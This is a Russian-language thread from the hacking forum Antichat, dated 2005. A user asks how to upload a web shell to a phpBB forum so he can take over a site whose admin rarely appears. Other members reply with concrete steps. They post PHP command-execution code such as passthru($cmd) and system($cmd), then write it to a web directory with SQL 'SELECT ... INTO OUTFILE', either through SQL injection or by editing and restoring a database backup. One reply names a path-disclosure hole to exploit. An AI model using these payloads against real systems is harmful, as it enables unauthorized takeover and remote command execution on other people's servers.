Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Залить шел на phpBB (https://forum.antichat.xyz/showthread.php?t=11458)

vorishka 07.12.2005 17:22
Залить шел на phpBB
 
Здрасте, народ! :)
Столкнулся с проблемой... Мона ли на phpBB залить шел. Если да то как расскажите подробней.
Хочу сайт забрать, а то админ на сайте появляется раз в год и них ничё не делает :(

FQziT 07.12.2005 18:06
Цитата:
SELECT post_text FROM phpbb_posts_text WHERE post_id =1234 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

смотрим номер нашего поста, подставляем в post_id а запостить нужно
<? passthru($cmd); ?>

путь можно узнать дырой в скрипте /db/oracle.php
Цитата:
SELECT word FROM phpbb_words WHERE word_id = 1 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

добавляем в админке наше слово (сами знаете какое) и восстанавливаем базу
Если помог, то репу мне повысь=))) А вообще Мемберу нужно самому уметь пользоваться поиском...=))) (не в обиду)

vorishka 07.12.2005 18:45
<<YaYaYa>> Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...

FQziT 07.12.2005 18:51
А что ты не понял? Через мускул заливаешь шел вот таким образом... по-моему все ясно

m0nzt3r 07.12.2005 18:53
а ты себя не мучай посмотри на rst.void.ru там вроде есть экспл для заливки шелла=)
не понял как это))
инфа с секьюрити сайтов канешна=)
сначала создаем топик с <? system($cmd) ?>
потом с помощью скуля той строкой которую ЙаЙа дал записываем название той темы в файл=) так что ЙаЙа повысь репу за инфу а мне за объяснение гы)

FQziT 07.12.2005 18:55
m0nzt3r поддерживаю=))

k1b0rg 07.12.2005 18:58
Цитата:
Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
это вставляеться в место где проходит скуль инъекция.
но врядли пройдет такая маза, думаю прав не хватит

FQziT 07.12.2005 19:04
Цитата:
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется
vorishka думаю теперь понятно будет.........

m0nzt3r 07.12.2005 19:22
k1b0rg ну может у него доступ в админку есть))

FQziT 07.12.2005 19:36
Цитата:
Сообщение от m0nzt3r
ну может у него доступ в админку есть))
Если бы у него не было бы лоступа в админку, то он бы спрашивал как получить этот самый доступ, а не как залить шел. Я так думаю)))
А вообще по моим постам думаю все ясно. Хотя это не всегда проходит, т.к. папка куда ты хочешь залить шел должна быть открыта на запись, а таких папок иногда бывает не много=)) Поэтому придется помутить с этим.
ЗЫ жадные вы на репутацию)


Время: 01:24
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице